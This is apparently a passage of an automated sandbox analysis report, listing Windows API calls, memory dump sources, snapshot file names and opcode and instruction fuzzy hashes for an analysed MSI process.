                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00334460,000000FF,?,002F474D,002F3778,?,00000000,00000000,?,?,?), ref: 002F45F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$LoadLockSizeof
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2853612939-0
                                                                                                                                            • Opcode ID: 1e77ac025f72c310c1dc008d4e41f0b877902571d601b317787b380c0fe37794
                                                                                                                                            • Instruction ID: 53c5372a1dda987a223c275e9e0a98bedba4a1bdf09b1feab946f907fd537d29
                                                                                                                                            • Opcode Fuzzy Hash: 1e77ac025f72c310c1dc008d4e41f0b877902571d601b317787b380c0fe37794
                                                                                                                                            • Instruction Fuzzy Hash: 07112372A046599BD7359F19DC84B77F3ACE786B68F00053AED2AC3340EA75AC008690
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0032E237,00000001,00000000,?,-00000050,?,0032E868,00000000,?,?,?,00000055,?), ref: 0032E183
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                            • String ID: h2
                                                                                                                                            • API String ID: 2417226690-3066208935
                                                                                                                                            • Opcode ID: d58dd2f8e2b554f6213a67038dd7e4f059720dfcd0d4be39783f3cd58806ec9b
                                                                                                                                            • Instruction ID: d3a9cc15423e814767b805d9683b01d6b5f34776ceee90f4192769258d0df798
                                                                                                                                            • Opcode Fuzzy Hash: d58dd2f8e2b554f6213a67038dd7e4f059720dfcd0d4be39783f3cd58806ec9b
                                                                                                                                            • Instruction Fuzzy Hash: A111293B2007119FDB19AF38D8A25BAB791FF84719B15443CE54747B40D3717942CB40
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00324E3F,?,20001004,00000000,00000002,?,?,00324441), ref: 003276E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2299586839-1316489359
                                                                                                                                            • Opcode ID: 0f60348e1698ee8118ea541aa3bdd150827e32fe84d431e69c1fef5a37ce6b68
                                                                                                                                            • Instruction ID: f8f4d9f84400666d3aab82c3d1cc32c29feda5dbd04c0b41a09edc37d9252edc
                                                                                                                                            • Opcode Fuzzy Hash: 0f60348e1698ee8118ea541aa3bdd150827e32fe84d431e69c1fef5a37ce6b68
                                                                                                                                            • Instruction Fuzzy Hash: 06E04F3250863CBBCF232F61FC09EAE3E2AFF44750F004410FC0565120CB318920AAD5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                            • Instruction ID: 65aba4ea3aebb361ca7a1a9c2aa63b92b4fcf30608ac4ccc202f417fd83555a2
                                                                                                                                            • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                            • Instruction Fuzzy Hash: 55F14075E002199FDF19CFA9C8806EDB7B2FF98324F158269E815AB381D731AD45CB90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0$T4
                                                                                                                                            • API String ID: 0-1950495336
                                                                                                                                            • Opcode ID: 2d14d0593c8bf20a78536a61d55c6a89b264af23dfa17ac273d358957222f415
                                                                                                                                            • Instruction ID: 5547f3f05d713e1cddf97242b14268699e6c5d267f0830a1f4fc709ec3e29c75
                                                                                                                                            • Opcode Fuzzy Hash: 2d14d0593c8bf20a78536a61d55c6a89b264af23dfa17ac273d358957222f415
                                                                                                                                            • Instruction Fuzzy Hash: A3C1D170502A068FCB2ECF68C4906FEBBB6BF4D312F154619D4969B691C730ADC6CB52
                                                                                                                                            APIs
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00327F64,00000000,00000000,00000000), ref: 00327E23
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 565725191-0
                                                                                                                                            • Opcode ID: c3d3fac8d7538b3b8b8ef564db94b4ca7f0a4e3fb8bdba15e9f164fc4dfe5a19
                                                                                                                                            • Instruction ID: f86f11ed5edd5df2ef3bc7b5f832d9e0223d908c779cc61c9c9358c8fa32899a
                                                                                                                                            • Opcode Fuzzy Hash: c3d3fac8d7538b3b8b8ef564db94b4ca7f0a4e3fb8bdba15e9f164fc4dfe5a19
                                                                                                                                            • Instruction Fuzzy Hash: B7C10576D04235ABDB27AB64EC02ABEB7B8FF05750F154056F901AF291EB309E41C790
                                                                                                                                            APIs
                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003284B8,?,?,00000008,?,?,003314E4,00000000), ref: 003286EA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                            • Opcode ID: 3efc00e6b9a6aca9350bf2dc0d863905dad09e02b6fcd51742866c9f5e73bfe0
                                                                                                                                            • Instruction ID: aea2733090cf97dba55b0effcef64d0b97141157ca28f95bebb59d4340cd3950
                                                                                                                                            • Opcode Fuzzy Hash: 3efc00e6b9a6aca9350bf2dc0d863905dad09e02b6fcd51742866c9f5e73bfe0
                                                                                                                                            • Instruction Fuzzy Hash: 33B16C31211618CFD716CF2CD48AB647BE0FF45364F268658E99ACF2A1CB35E992CB40
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003135BF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                            • Opcode ID: 42015d27a87b2c9f181f8e0b1c5133047eb5dbe43e0ae6802e4681d291f652e2
                                                                                                                                            • Instruction ID: f4c91c5dc3801c319202fc326e7296b83ae98c0fa59cd1cd72cdb7478b44a6ee
                                                                                                                                            • Opcode Fuzzy Hash: 42015d27a87b2c9f181f8e0b1c5133047eb5dbe43e0ae6802e4681d291f652e2
                                                                                                                                            • Instruction Fuzzy Hash: 2F519CB5E11205CBEB1ACF58D8857AABBF4FB09354F15806AD405EB3A0D774AE40CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6c050c2ad554b515170f4c6be9458e7a4f9bc5f579ddb2b7128b275b97657b96
                                                                                                                                            • Instruction ID: e882a9a1bd8a2b7228e2d5942d24f366451940bbed3560ff892b2571ddbf7a66
                                                                                                                                            • Opcode Fuzzy Hash: 6c050c2ad554b515170f4c6be9458e7a4f9bc5f579ddb2b7128b275b97657b96
                                                                                                                                            • Instruction Fuzzy Hash: 3231E472900629AFCB21DFA9DC89DBBB76DEB84310F158158F81597240EA30AE408B60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E4DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                            • Opcode ID: 9c23fc0df5d60eb9c00bbedb58c1b03951e87c9af06b53369e138d4235090d6a
                                                                                                                                            • Instruction ID: 2a630eef3a40b26e1bc02e45573bc512159e43e672d9df14ee60a73db51c35b4
                                                                                                                                            • Opcode Fuzzy Hash: 9c23fc0df5d60eb9c00bbedb58c1b03951e87c9af06b53369e138d4235090d6a
                                                                                                                                            • Instruction Fuzzy Hash: E2219572664216ABDB2A9F29EC42ABA73ACEF05714F240079F905DA141FB74ED40C750
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0032E453,00000000,00000000,?), ref: 0032E6E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                            • Opcode ID: 2de1bd23f7be0c7df9d2dfe65538f3b003717b7432507fe7fe0272780f06ae3d
                                                                                                                                            • Instruction ID: 8af53e27b7073bc52c90dc8c72f459388f0b357af1530adf830b8543d3ee9fe2
                                                                                                                                            • Opcode Fuzzy Hash: 2de1bd23f7be0c7df9d2dfe65538f3b003717b7432507fe7fe0272780f06ae3d
                                                                                                                                            • Instruction Fuzzy Hash: B7F0CD36A00232BBDB2A5768DC47BFA776CEB40754F150824EC16A7180EA74FD41D6A0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0032E48A,00000001,?,?,-00000050,?,0032E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0032E1F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                            • Opcode ID: 2fb33c6e32cefbaf6f3f51a8b8589943d807533bb7e41ab1ea15bf143b4931b8
                                                                                                                                            • Instruction ID: 8acca41708e64863e697a175eb6f1a1809a5812d6640d6c12efb62df44351a1a
                                                                                                                                            • Opcode Fuzzy Hash: 2fb33c6e32cefbaf6f3f51a8b8589943d807533bb7e41ab1ea15bf143b4931b8
                                                                                                                                            • Instruction Fuzzy Hash: 3EF02B363003149FDB266F39EC86A7A7B99FF80768F05443DF9068B690D6B1AC42DB50
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00321C9A: EnterCriticalSection.KERNEL32(-0034DE50,?,00323576,?,0034A078,0000000C,00323841,?), ref: 00321CA9
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00327125,00000001,0034A1D8,0000000C,00327554,00000000), ref: 0032716A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                            • Opcode ID: 1720937ecf220234aaceabb5c69c62066d01b3f380d71890ade4984b5e3a65f1
                                                                                                                                            • Instruction ID: ea7d48a8ad73428f381edb0683cf9412f38824c75acc0a566db07a081b541201
                                                                                                                                            • Opcode Fuzzy Hash: 1720937ecf220234aaceabb5c69c62066d01b3f380d71890ade4984b5e3a65f1
                                                                                                                                            • Instruction Fuzzy Hash: D3F04976A54220EFD706DF98E846B9D77F0FB49726F10455AF410DF2A0DB75A9008F40
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0032E01F,00000001,?,?,?,0032E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0032E0FD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                            • Opcode ID: 2e22ae69f07e1343bb05d6713cf4a63add18a5a8972f59ee8b1227059b0d9dee
                                                                                                                                            • Instruction ID: 23d0a46322673e96324ff80cba2f03a850e4e19ce58090ff942dd7e80dc772e2
                                                                                                                                            • Opcode Fuzzy Hash: 2e22ae69f07e1343bb05d6713cf4a63add18a5a8972f59ee8b1227059b0d9dee
                                                                                                                                            • Instruction Fuzzy Hash: B8F02B3A30031597CB16AF3AEC466AA7F95EFC1B61F074068EE058F651C6B29983D790
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,003100E2,00000000,00000000,00000004,0030ED14,00000000,00000004,0030F127,00000000,00000000), ref: 00312410
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: 33e2d8a0827c994d96ae3fbb244ba57e51ef77df58ed2eef20480b6bc3312222
                                                                                                                                            • Instruction ID: 0af6b0d28724efc633a6661f11386d678f132b77ec12f5dcd15ba7d06682f4e8
                                                                                                                                            • Opcode Fuzzy Hash: 33e2d8a0827c994d96ae3fbb244ba57e51ef77df58ed2eef20480b6bc3312222
                                                                                                                                            • Instruction Fuzzy Hash: DCE0D832654114BAE71B4B79AF0FFFB76ACD70470AF904151E902D40D1DEA1CA50E161
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00313077), ref: 00313544
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 5b5c4bc2b33169f109d1eb6f38f14bba0afe026340ea5a768752b96d7e4d3cc2
                                                                                                                                            • Instruction ID: 84358c19aa5f5e3d3b8ca01ecd8d4b9d1bb28bd255f5a0d75a39c764a781f62e
                                                                                                                                            • Opcode Fuzzy Hash: 5b5c4bc2b33169f109d1eb6f38f14bba0afe026340ea5a768752b96d7e4d3cc2
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                            • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                            • Instruction ID: 782961531f5c99354a4e96f4c885e16cf0f9807b4098d3722cc59f0a28c4fb07
                                                                                                                                            • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                            • Instruction Fuzzy Hash: D132C074A0022ADFCF29CF98D981ABEB7B5EF54304F154168DC41AB356D732AE46CB80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 49a60150ad51e7c0472a47ef6e2a451a719bd1eaf2b32fd00a3c3750326f20c8
                                                                                                                                            • Instruction ID: 4ac5e5e6f40e7bed7ecf1a57d0cc12340e244a8886e8dc357c3bd2582a46d02d
                                                                                                                                            • Opcode Fuzzy Hash: 49a60150ad51e7c0472a47ef6e2a451a719bd1eaf2b32fd00a3c3750326f20c8
